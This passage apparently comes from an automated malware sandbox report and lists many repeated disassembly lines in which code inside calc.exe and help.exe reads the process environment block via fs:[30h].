          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0345FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03478ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0343FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03470EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03470EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03470EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034246A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03423540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033CC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033CC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033C7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03478D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0342A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03426DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03426DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03426DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03426DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03426DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03426DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03458DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033BD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033BD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0343C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0343C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03426C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03426C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03426C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03426C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0347740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0347740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0347740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033C746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03478CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03426CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03426CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03426CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034614FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B046A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A976E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B58ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B3FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B3FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B3B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B3B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B58A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B14257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B55BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A91B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A91B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B3D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B4138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A84F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A84F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B4131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B5070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B5070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AAF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B58F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B58B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AC90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A89080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B03884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B03884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B414FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B58CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B54015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B54015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B51074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B42073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B1C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AAC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02ABFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B38DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02A9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B141E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B58D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02B0A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AA4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_02AB4D3B mov eax, dword ptr fs:[00000030h]
